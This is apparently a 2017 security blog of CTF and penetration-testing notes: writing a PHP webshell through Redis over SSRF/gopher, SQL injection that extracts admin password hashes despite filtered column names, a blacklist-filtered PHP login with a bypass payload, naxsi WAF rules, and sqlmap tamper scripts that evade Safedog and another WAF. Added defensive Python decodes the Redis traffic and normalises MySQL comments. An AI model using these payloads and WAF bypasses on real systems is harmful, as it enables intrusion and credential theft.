wubba lubba dub dub.
post @ 2017-12-05

Orange put it this way in his Black Hat paper:

Protocols that are suitable to smuggle
  HTTP based protocol:
    Elastic, CouchDB, Mongodb, Docker

  Text-based protocol:
    FTP, SMTP, Redis, Memcached

Ph also mentioned this in https://www.leavesongs.com/PENETRATION/getshell-via-ssrf-and-redis.html: the Redis protocol is a simple protocol stream. See the official Redis description at https://redis.io/topics/protocol.

https://blog.chaitin.cn/gopher-attack-surfaces/
That article describes using gopher to attack Redis; the steps it uses are:

  • Start redis-server listening on port 6378: redis-server /etc/redis/redis.conf --port 6378
  • Run socat -v tcp-listen:6379,fork tcp-connect:localhost:6378
  • Then use Redis as normal to carry out the attack

Writing a shell

This forwards the traffic on port 6379 to port 6378, where redis-server is actually listening, so socat -v prints every byte that passes through. Writing a shell through redis-server goes like this:

redis-cli -h 127.0.0.1 flushall
redis-cli -h 127.0.0.1 config set dir /var/www
redis-cli -h 127.0.0.1 config set dbfilename shell.php
redis-cli -h 127.0.0.1 set webshell "<?php phpinfo();?>"
redis-cli -h 127.0.0.1 save 

The data stream obtained is as follows:

*1\r
$8\r
flushall\r
*4\r
$6\r
config\r
$3\r
set\r
$3\r
dir\r
$8\r
/var/www\r
*4\r
$6\r
config\r
$3\r
set\r
$10\r
dbfilename\r
$9\r
shell.php\r
*3\r
$3\r
set\r
$3\r
web\r
$18\r
<?php phpinfo();?>\r
*1\r
$4\r
save\r
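As an added illustration (my own code, not from this post or any of the linked articles), here is a small Python decoder for the RESP stream above, together with the check a defender would run over captured Redis traffic: it flags the CONFIG SET dir/dbfilename followed by SAVE sequence that turns the RDB dump into an arbitrary file write. The byte string is the post's capture re-assembled with CRLF line endings (constructed sample input); the function names are mine.

```python
# Constructed sample input: the RESP stream the post captured with socat,
# re-assembled as bytes (each line on the wire ends with CRLF).
CAPTURED_STREAM = (
    b"*1\r\n$8\r\nflushall\r\n"
    b"*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$8\r\n/var/www\r\n"
    b"*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$9\r\nshell.php\r\n"
    b"*3\r\n$3\r\nset\r\n$3\r\nweb\r\n$18\r\n<?php phpinfo();?>\r\n"
    b"*1\r\n$4\r\nsave\r\n"
)


def parse_resp_commands(stream):
    """Decode a client-to-server RESP stream (arrays of bulk strings) into a
    list of commands, each a list of str arguments. Malformed or truncated
    input raises ValueError rather than being guessed at."""
    commands = []
    pos = 0

    def read_line():
        nonlocal pos
        end = stream.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing CRLF at offset %d" % pos)
        line = stream[pos:end]
        pos = end + 2
        return line

    while pos < len(stream):
        header = read_line()
        if not header.startswith(b"*"):
            raise ValueError("expected array header, got %r" % header)
        argc = int(header[1:])
        args = []
        for _ in range(argc):
            bulk_header = read_line()
            if not bulk_header.startswith(b"$"):
                raise ValueError("expected bulk string header, got %r" % bulk_header)
            length = int(bulk_header[1:])
            data = stream[pos:pos + length]
            if len(data) != length or stream[pos + length:pos + length + 2] != b"\r\n":
                raise ValueError("truncated bulk string at offset %d" % pos)
            pos += length + 2
            args.append(data.decode("utf-8", errors="replace"))
        commands.append(args)
    return commands


# CONFIG SET on either of these keys decides where the next SAVE writes its RDB file.
RDB_PATH_KEYS = {"dir", "dbfilename"}


def audit_rdb_abuse(commands):
    """Return (command index, description) findings for the write-file-via-SAVE
    pattern: CONFIG SET dir/dbfilename followed later by SAVE or BGSAVE."""
    findings = []
    repointed = False
    for idx, cmd in enumerate(commands):
        if not cmd:
            continue
        name = cmd[0].lower()
        if (name == "config" and len(cmd) >= 4
                and cmd[1].lower() == "set" and cmd[2].lower() in RDB_PATH_KEYS):
            repointed = True
            findings.append((idx, "CONFIG SET %s %s" % (cmd[2].lower(), cmd[3])))
        elif name in ("save", "bgsave") and repointed:
            findings.append((idx, "%s after dir/dbfilename were changed: "
                                  "the RDB dump lands on a caller-chosen path" % name.upper()))
    return findings


if __name__ == "__main__":
    decoded = parse_resp_commands(CAPTURED_STREAM)
    for command in decoded:
        print(" ".join(command))
    for index, reason in audit_rdb_abuse(decoded):
        print("finding at command %d: %s" % (index, reason))
```

On the mitigation side, this exact sequence is what `rename-command CONFIG ""` and `requirepass` in redis.conf exist for, and Redis 3.2 and later refuse unauthenticated non-loopback clients when protected-mode is on. A Redis instance reachable through an SSRF-driven gopher client is reachable without any password, so the relay and the decoder above are also a cheap way to see what such a client actually sent.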
Read More

http://blog.7ell.me/2017/05/30/2017-DDCTF-SQL注入之过滤列名get数据/

mysql> select * from (select 1)a,(select 2)b,(select 3)c;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from admin;
+---+--------+----------------------------------+
| 1 | 2      | 3                                |
+---+--------+----------------------------------+
| 1 | 2      | 3                                |
| 1 | admin  | e10adc3949ba59abbe56e057f20f883e |
| 2 | admin2 | 7195ca99696b5a896d067a0fa9dc61a6 |
| 3 | admin3 | 7195C                            |
+---+--------+----------------------------------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from admin)e;
+----------------------------------+
| 3                                |
+----------------------------------+
| 3                                |
| e10adc3949ba59abbe56e057f20f883e |
| 7195ca99696b5a896d067a0fa9dc61a6 |
| 7195C                            |
+----------------------------------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from admin)e limit 1 offset 3;
+-------+
| 3     |
+-------+
| 7195C |
+-------+
1 row in set (0.00 sec)

mysql> select * from admin where id=1 union select 1,2,3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | e10adc3949ba59abbe56e057f20f883e |
|  1 | 2        | 3                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where id=1 union select (select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from admin)e limit 1 offset 3),2,3;
+-------+----------+----------------------------------+
| id    | username | password                         |
+-------+----------+----------------------------------+
| 1     | admin    | e10adc3949ba59abbe56e057f20f883e |
| 7195C | 2        | 3                                |
+-------+----------+----------------------------------+
2 rows in set (0.00 sec)
Read More
post @ 2017-11-23

http://wonderkun.cc/index.html/?p=547
Source code:

<?php
  $dbhost = "172.19.0.2";
  $dbuser = "root";
  $dbpass = "root";
  $db = "vul";
  $conn = mysqli_connect($dbhost,$dbuser,$dbpass,$db);
  mysqli_set_charset($conn,"utf8");

  /* sql

     create table `admin` (
        `id` int(10) not null primary key auto_increment,
        `username` varchar(20) not null ,
        `password` varchar(32) not null
     );
  */
  // Blacklist filter: the pattern is applied to the lowercased input, and any hit kills the request.
  function filter($str){
      $filterlist = "/\(|\)|username|password|where|case|when|like|regexp|into|limit|=|for|;/";
      if(preg_match($filterlist,strtolower($str))){
        die("illegal input!");
      }
      return $str;
  }
  $username = isset($_POST['username'])?filter($_POST['username']):die("please input username!");
  $password = isset($_POST['password'])?filter($_POST['password']):die("please input password!");
  // Both values are concatenated straight into the query after passing the blacklist.
  $sql = "select * from admin where username = '$username' and password = '$password' ";

  $res = $conn -> query($sql);
  if($res->num_rows>0){
    $row = $res -> fetch_assoc();
    if($row['id']){
       echo $row['username'];
    }
  }else{
     echo "The content in the password column is the ";
  }

?>

In the source above, the value of username has to be guessed first; the payload given in the article is

username='^1^1#&password=1

At first sight the payload is not obvious; then I remembered MySQL's weak type conversion, as follows:

That is, if username in the query equals 0, every row is returned, and any of the statements below turns username into 0:

select * from admin where username=''*0
select * from admin where username=''/2
select * from admin where username=''^1^1
select * from admin where username=''-''

Next, blind injection based on order by:

First, the basics:

Read More
post @ 2017-11-02
  • MainRule: defines the detection rules and their scores
  • BasicRule: defines whitelists for MainRules
  • CheckRule: defines the action taken when a score reaches a threshold

CheckRules

The CheckRule directive has four actions:

LOG, BLOCK, DROP, ALLOW

When is each of these four actions taken? It depends on the score the request accumulates.

Basic Usage

CheckRule "$SQL >= 8" BLOCK;

If $SQL is greater than or equal to 8, the request is BLOCKed. (This presupposes the firewall is in filtering mode rather than learning mode.)

Other Usages

Here is another usage: when whitelists and blacklists are used together, for example with rules like these:

CheckRule "$UWA >= 4" DROP;
CheckRule "$XSS >= 8" BLOCK;
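To make the scoring concrete, here is an added Python model (my own code, not naxsi's) of how CheckRule thresholds act on the scores that matching MainRules accumulate. It parses the CheckRule lines from this post, sums per-variable scores from a constructed list of MainRule hits, and decides the action. The precedence between rules that fire at the same time, and treating DROP as enforced even in learning mode, are modelling assumptions; the function names are mine.

```python
import re

# Constructed sample configuration: the CheckRule lines quoted in the post.
CHECK_RULES_CONF = """
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$UWA >= 4" DROP;
CheckRule "$XSS >= 8" BLOCK;
"""

CHECK_RULE_RE = re.compile(
    r'CheckRule\s+"\$(?P<var>\w+)\s*(?P<op>>=|<=|>|<|=)\s*(?P<thr>\d+)"'
    r'\s+(?P<action>LOG|BLOCK|DROP|ALLOW)\s*;'
)

OPS = {
    ">=": lambda a, b: a >= b,
    "<=": lambda a, b: a <= b,
    ">": lambda a, b: a > b,
    "<": lambda a, b: a < b,
    "=": lambda a, b: a == b,
}

# Precedence when several CheckRules fire at once (a modelling assumption,
# not taken from naxsi's source): DROP beats BLOCK beats LOG beats ALLOW.
SEVERITY = {"DROP": 3, "BLOCK": 2, "LOG": 1, "ALLOW": 0}


def parse_check_rules(conf):
    """Parse CheckRule directives into (variable, operator, threshold, action) tuples."""
    rules = []
    for m in CHECK_RULE_RE.finditer(conf):
        rules.append(("$" + m.group("var"), m.group("op"),
                      int(m.group("thr")), m.group("action")))
    return rules


def score_request(main_rule_hits):
    """Sum the scores of every MainRule that matched, per score variable.
    Each hit is a dict such as {"$SQL": 4, "$XSS": 8}, mirroring a
    MainRule's s:$SQL:4,$XSS:8 score field."""
    scores = {}
    for hit in main_rule_hits:
        for var, points in hit.items():
            scores[var] = scores.get(var, 0) + points
    return scores


def decide(check_rules, scores, learning_mode=False):
    """Return the action for a request given its accumulated scores.
    In learning mode a BLOCK is downgraded to LOG (the request is only
    reported); DROP is modelled as enforced regardless (assumption)."""
    outcome = "ALLOW"
    for var, op, threshold, action in check_rules:
        if OPS[op](scores.get(var, 0), threshold):
            if learning_mode and action == "BLOCK":
                action = "LOG"
            if SEVERITY[action] > SEVERITY[outcome]:
                outcome = action
    return outcome


if __name__ == "__main__":
    rules = parse_check_rules(CHECK_RULES_CONF)
    # Constructed hits: two MainRules matched, one scoring $SQL:4,$XSS:8 and one $SQL:4.
    scores = score_request([{"$SQL": 4, "$XSS": 8}, {"$SQL": 4}])
    print(scores, "->", decide(rules, scores), "(filtering mode)")
    print(scores, "->", decide(rules, scores, learning_mode=True), "(learning mode)")
```

The point the model makes explicit is that a single $SQL:4 hit is harmless on its own, while two of them cross the "$SQL >= 8" threshold; a BasicRule whitelist removes a hit before it is scored, which is why whitelisting one false-positive MainRule can be enough to keep a legitimate request under the threshold.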
Read More
post @ 2017-10-30

Bypassing Safedog is fairly simple, but I will write it down anyway:

https://secvul.com/topics/876.html
http://www.freebuf.com/articles/network/150646.html

According to numerous articles, all you need to do to get past Safedog is modify the comment token by inserting a character in the middle, e.g. /**a**/. The tamper.py is as follows:

#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**s**/'
    (sqlmap's space2comment with a character inserted into the comment)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**s**/id/**s**/FROM/**s**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in range(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**s**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**s**/"
                continue

            retVal += payload[i]

    return retVal

No real technical content there. Next is bypassing 数字卫士, which has to be split by case: UNION-based and error-based injection. For these injections the following steps need changing.
First, modify the tamper:

#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.data import kb
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS

__priority__ = PRIORITY.HIGHER

def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):
    """
    Adds versioned MySQL comment before each keyword

    Requirement:
        * MySQL < 5.1

    Tested against:
        * MySQL 4.0.18, 5.0.22

    Notes:
        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
    "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
    """

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "/*!50001%s*/ " % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
        retVal = retVal.replace(" /*!50001*/", "/*!50001*/")

    return retVal

The comment bypass: 50001 means the statement is executed if the MySQL version is 5.00.01, i.e. 5.0.1.

For example, with MySQL version 5.5.53:

select * from users where id=1 /*!50553union*/ /*!50002select*/ 3,2,3 order by id desc;

This statement executes successfully; if 50553 is changed to 50554, it fails.
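Both tamper scripts above depend on the WAF matching the raw request text while MySQL discards comments and conditionally executes the body of /*!NNNNN ... */ comments. The example below, added here and neither sqlmap's code nor the post's, shows the defender's counterpart: canonicalise the query the way the server will read it before running signatures, using the version threshold from the 5.5.53 experiment above. Function and regex names are mine; with server_version=None every versioned comment is assumed to execute, which is the safe default for a WAF that cannot know the backend version.

```python
import re

# Matches both plain C-style comments and MySQL "versioned" comments.
# group(1): the 5-digit version after "/*!" (None for plain /*...*/)
# group(2): the body of a versioned comment
COMMENT_RE = re.compile(r"/\*!(\d{5})?(.*?)\*/|/\*.*?\*/", re.S)

# Signature run over the canonical form, not the raw request.
UNION_SELECT_RE = re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)


def mysql_version_number(version):
    """(5, 5, 53) -> 50553, the number MySQL compares /*!NNNNN */ against."""
    major, minor, patch = version
    return major * 10000 + minor * 100 + patch


def normalize_mysql(sql, server_version=None):
    """Rewrite sql the way the MySQL server will effectively read it:
    plain comments (including /**s**/-style variants) become whitespace, and
    /*!NNNNN body*/ is replaced by its body when the server is at least NNNNN.
    server_version=None keeps every body, the conservative choice for a WAF.
    Whitespace inside string literals is collapsed too; this is a form for
    matching signatures, not for executing."""
    ver = None if server_version is None else mysql_version_number(server_version)

    def replace(m):
        if m.group(0).startswith("/*!"):
            minimum = int(m.group(1)) if m.group(1) else 0
            if ver is None or ver >= minimum:
                # The comment body is tokenised as SQL, so pad it like whitespace.
                return " " + m.group(2) + " "
        return " "

    collapsed = COMMENT_RE.sub(replace, sql)
    return re.sub(r"\s+", " ", collapsed).strip()


def flags_union_select(sql, server_version=None):
    """True when the canonical form contains a UNION [ALL] SELECT."""
    return bool(UNION_SELECT_RE.search(normalize_mysql(sql, server_version)))


if __name__ == "__main__":
    # The statement from the post, executed by a 5.5.53 server.
    sample = "select * from users where id=1 /*!50553union*/ /*!50002select*/ 3,2,3 order by id desc"
    print(normalize_mysql(sample, (5, 5, 53)))
    print(normalize_mysql(sample.replace("50553", "50554"), (5, 5, 53)))
    print(flags_union_select(sample, (5, 5, 53)), flags_union_select(sample.replace("50553", "50554")))
```

The raw string "/*!50553union*/" never matches a \bunion\b signature because the digit before "union" is a word character, which is exactly the gap the versioned-keywords tamper exploits; after normalisation the 5.5.53 server's view "union select" matches, and the 50554 variant, which the post reports as failing on that server, is correctly left alone only when the WAF is told the version, otherwise it is flagged.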

Read More